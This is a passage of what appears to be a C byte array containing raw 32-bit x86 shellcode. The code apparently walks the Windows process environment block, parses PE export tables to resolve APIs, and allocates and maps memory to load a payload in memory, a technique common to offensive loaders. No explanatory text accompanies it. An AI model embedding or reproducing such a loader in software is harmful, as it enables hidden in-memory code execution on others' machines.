30 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08,
31 0x02, 0x00, 0x00, 0x89, 0x85, 0xc4, 0xfd, 0xff, 0xff, 0x8b, 0x85, 0xd0,
32 0xfd, 0xff, 0xff, 0x83, 0xe0, 0xfc, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff,
33 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd,
34 0xff, 0xff, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xdc, 0xff, 0xd0, 0x83, 0xec,
35 0x08, 0xeb, 0x0b, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0x00,
36 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8d, 0x65, 0xf8, 0x5b, 0x5e, 0x5d, 0xc3,
37 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec, 0xbc, 0x01, 0x00, 0x00,
38 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x4c, 0x8b, 0x40, 0x48, 0x89, 0x45, 0xd0,
39 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
40 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
41 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
42 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3d, 0x10, 0x00, 0x00, 0x89, 0x45, 0xcc,
43 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x54, 0x8b, 0x40, 0x50, 0x89, 0x45, 0xd0,
44 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
45 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
46 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
47 0x08, 0x89, 0x04, 0x24, 0xe8, 0x01, 0x10, 0x00, 0x00, 0x89, 0x45, 0xc8,
48 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xc4, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xc0,
49 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08,
50 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54,
51 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b, 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04,
52 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbf,
53 0x0f, 0x00, 0x00, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xcc, 0x00, 0x74, 0x0c,
54 0x83, 0x7d, 0xc8, 0x00, 0x74, 0x06, 0x83, 0x7d, 0xc4, 0x00, 0x75, 0x0a,
55 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x8d, 0x07, 0x00, 0x00, 0x8b, 0x45,
56 0x08, 0x8b, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7,
57 0x44, 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0xc7,
58 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0xff, 0xd0, 0x83,
59 0xec, 0x10, 0x89, 0x45, 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x75, 0x27, 0x8b,
60 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75,
61 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc4, 0xff,
62 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x35, 0x07,
63 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b,
64 0x45, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc0, 0x89, 0x04, 0x24,
65 0xe8, 0x61, 0x51, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x89, 0x45, 0x08, 0xc7,
66 0x44, 0x24, 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
67 0x00, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24,
68 0xe8, 0x0f, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02,
69 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x9e, 0x00, 0x00, 0x00, 0x8b,
70 0x45, 0x08, 0x05, 0x10, 0x02, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x8b, 0x45,
71 0x08, 0x8b, 0x00, 0x8d, 0x88, 0xf0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x08,
72 0x8d, 0x58, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x50, 0x04, 0x89, 0x4c, 0x24,
73 0x0c, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
74 0x89, 0x14, 0x24, 0xe8, 0xae, 0x5b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
75 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c,
76 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c,
77 0x24, 0xe8, 0x78, 0x58, 0x00, 0x00, 0x89, 0x45, 0xb0, 0x89, 0x55, 0xb4,
78 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x00,
79 0x0d, 0x00, 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xb0, 0x89, 0x9d, 0x60, 0xfe,
80 0xff, 0xff, 0x89, 0xd0, 0x33, 0x45, 0xb4, 0x89, 0x85, 0x64, 0xfe, 0xff,
81 0xff, 0x8b, 0x8d, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x9d, 0x64, 0xfe, 0xff,
82 0xff, 0x89, 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x85, 0xf3, 0x04, 0x00,
83 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45,
84 0x08, 0x8b, 0x50, 0x34, 0x8b, 0x40, 0x30, 0x89, 0x4c, 0x24, 0x0c, 0x89,
85 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b,
86 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x2c, 0x0e, 0x00, 0x00, 0x8b, 0x55,
87 0x08, 0x89, 0x42, 0x30, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x85, 0xc0,
88 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xff, 0x05, 0x00, 0x00,
89 0x8b, 0x45, 0x08, 0x05, 0x14, 0x02, 0x00, 0x00, 0x89, 0x45, 0xdc, 0xc7,
90 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xdc, 0x8b,
91 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff,
92 0xff, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xe4, 0x01,
93 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
94 0xc0, 0x74, 0x18, 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f,
95 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x09, 0x81, 0x7d, 0xe4, 0x03, 0x01, 0x00,
96 0x00, 0x76, 0xbd, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x2e, 0x8b, 0x45, 0xe4,
97 0x83, 0xc0, 0x01, 0x01, 0x45, 0xdc, 0x8d, 0x95, 0x74, 0xfe, 0xff, 0xff,
98 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0x74, 0xfe,
99 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
100 0xe8, 0xeb, 0x08, 0x00, 0x00, 0xeb, 0x80, 0x90, 0xc7, 0x45, 0xe4, 0x01,
101 0x00, 0x00, 0x00, 0xe9, 0x96, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
102 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83,
103 0xc2, 0x06, 0x8d, 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0x4c,
104 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54,
105 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x45, 0x0d, 0x00,
106 0x00, 0x8b, 0x55, 0x08, 0x8b, 0x4d, 0xe4, 0x83, 0xc1, 0x0c, 0x89, 0x04,
107 0x8a, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x0c, 0x8b, 0x04,
108 0x90, 0x85, 0xc0, 0x75, 0x41, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x7c, 0x01,
109 0x00, 0x00, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89,
110 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x06, 0x8d,
111 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0xc3, 0x33, 0x5d, 0xd0,
112 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45, 0xd4, 0x89, 0xc7, 0x89, 0xf8, 0x09,
113 0xf0, 0x85, 0xc0, 0x0f, 0x85, 0x86, 0x03, 0x00, 0x00, 0x90, 0x83, 0x45,
114 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
115 0x45, 0xe4, 0x0f, 0x82, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
116 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x21, 0x8b, 0x45,
117 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5c, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x0f,
118 0x84, 0x51, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
119 0x00, 0x00, 0x89, 0x45, 0xe0, 0xeb, 0x2b, 0x8b, 0x45, 0x08, 0x8b, 0x80,
120 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x34, 0x03, 0x00,
121 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
122 0x01, 0x75, 0x0b, 0x8b, 0x45, 0x08, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x89,
123 0x45, 0xe0, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44,
124 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xa4, 0x0f,
125 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc,
126 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0xba,
127 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x89, 0x81, 0xf8, 0x01, 0x00,
128 0x00, 0x89, 0x91, 0xfc, 0x01, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x75,
129 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
130 0x02, 0x75, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
131 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9,
132 0xf7, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
133 0x00, 0x83, 0xf8, 0x01, 0x74, 0x72, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
134 0xe8, 0x82, 0x47, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00,
135 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83,
136 0xf8, 0x02, 0x0f, 0x84, 0x7c, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89,
137 0x04, 0x24, 0xe8, 0xa2, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d,
138 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
139 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x8b, 0x45,
140 0x08, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac,
141 0x83, 0x7d, 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44,
142 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x36, 0x02, 0x00, 0x00,
143 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x5b,
144 0x01, 0x00, 0x00, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
145 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x05, 0x2f,
146 0x15, 0x00, 0x00, 0x25, 0x00, 0xf0, 0xff, 0xff, 0x89, 0x85, 0x70, 0xfe,
147 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24,
148 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00,
149 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7,
150 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x78, 0xff, 0xff,
151 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
152 0xe8, 0x8b, 0x53, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x83, 0x7d, 0xa8, 0x00,
153 0x0f, 0x88, 0xbb, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
154 0xc7, 0x44, 0x24, 0x08, 0x30, 0x05, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x89,
155 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x4d, 0x00, 0x00, 0x8b,
156 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x0f, 0x8b, 0x45,
157 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f, 0x85, 0x81, 0x00, 0x00,
158 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45,
159 0xe0, 0x8b, 0x98, 0x20, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x05, 0x28,
160 0x05, 0x00, 0x00, 0x89, 0x85, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe0,
161 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
162 0x8d, 0xb8, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08,
163 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x8d, 0x75, 0x9c,
164 0x89, 0x74, 0x24, 0x14, 0x89, 0x5c, 0x24, 0x10, 0x8b, 0xb5, 0x60, 0xfe,
165 0xff, 0xff, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x89, 0x7c,
166 0x24, 0x04, 0x89, 0x04, 0x24, 0xff, 0xd2, 0x83, 0xec, 0x18, 0x89, 0x45,
167 0xa4, 0x83, 0x7d, 0xa4, 0x00, 0x0f, 0x85, 0x11, 0x01, 0x00, 0x00, 0x8b,
168 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x45, 0xe0, 0xeb, 0x34, 0x8b, 0x45,
169 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x29, 0x8b, 0x85, 0x78,
170 0xff, 0xff, 0xff, 0x8d, 0x90, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0,
171 0x05, 0x28, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24,
172 0xe8, 0xbd, 0x49, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89,
173 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0a,
174 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x04, 0x75, 0x17, 0x8b, 0x45,
175 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
176 0xd0, 0x1d, 0x00, 0x00, 0xe9, 0xab, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0,
177 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
178 0x83, 0xf8, 0x02, 0x75, 0x53, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
179 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
180 0x08, 0x89, 0x04, 0x24, 0xe8, 0xcc, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
181 0x1c, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8b,
182 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
183 0xe8, 0xbe, 0x15, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
184 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x9f, 0x1b,
185 0x00, 0x00, 0xeb, 0x44, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x05,
186 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x2f,
187 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
188 0x24, 0xe8, 0x1c, 0x34, 0x00, 0x00, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
189 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
190 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
191 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02,
192 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
193 0xf8, 0x03, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
194 0x80, 0x30, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x77, 0x8b, 0x45, 0x08,
195 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00,
196 0x89, 0xc2, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89,
197 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89,
198 0x04, 0x24, 0xe8, 0xf5, 0x4a, 0x00, 0x00, 0xc7, 0x85, 0x70, 0xfe, 0xff,
199 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d,
200 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
201 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89,
202 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
203 0xff, 0xff, 0xe8, 0x40, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0xc7, 0x80,
204 0x30, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
205 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x94, 0xc0, 0x0f,
206 0xb6, 0xc0, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44,
207 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
208 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7b, 0x4a, 0x00, 0x00, 0x8b, 0x45, 0x08,
209 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
210 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04,
211 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0,
212 0x83, 0xec, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7,
213 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04,
214 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x7d, 0xa0,
215 0x00, 0x74, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
216 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x8d,
217 0x65, 0xf4, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec,
218 0x28, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x14, 0x00,
219 0x01, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44,
220 0x24, 0x0c, 0xff, 0xff, 0xff, 0xff, 0x8b, 0x55, 0x0c, 0x89, 0x54, 0x24,
221 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
222 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x18, 0xc9, 0xc3, 0x55,
223 0x89, 0xe5, 0x83, 0xec, 0x38, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
224 0xc7, 0x45, 0xdc, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x64, 0x8b,
225 0x00, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x30, 0x89, 0x45,
226 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45,
227 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x40, 0x8b, 0x45, 0xf4,
228 0x8b, 0x40, 0x18, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x3b, 0x45, 0x0c,
229 0x74, 0x26, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
230 0x14, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe4, 0x89, 0x44, 0x24, 0x04,
231 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x68, 0x00, 0x00, 0x00, 0x89,
232 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45,
233 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83,
234 0x7d, 0xf0, 0x00, 0x74, 0xb0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x8b,
235 0x45, 0x10, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
236 0xe8, 0x8b, 0x02, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00,
237 0x74, 0x1d, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x14, 0x89,
238 0x54, 0x24, 0x04, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
239 0xec, 0x08, 0x89, 0x45, 0xf0, 0xeb, 0x07, 0xc7, 0x45, 0xf0, 0x00, 0x00,
240 0x00, 0x00, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec,
241 0xd8, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x83,
242 0x7d, 0x0c, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x37,
243 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
244 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
245 0xe4, 0x8b, 0x45, 0xe4, 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45,
246 0xe0, 0x8b, 0x00, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a,
247 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x00, 0x02, 0x00, 0x00, 0x8b, 0x55,
248 0x0c, 0x8b, 0x45, 0xdc, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8,
249 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b,
250 0x45, 0xd8, 0x8b, 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
251 0xd0, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0,
252 0x89, 0x45, 0xcc, 0x83, 0x7d, 0x10, 0x00, 0x0f, 0x84, 0x8b, 0x00, 0x00,
253 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf0, 0x83, 0x7d,
254 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa8, 0x01,
255 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14,
256 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01, 0xd0, 0x8b, 0x10,
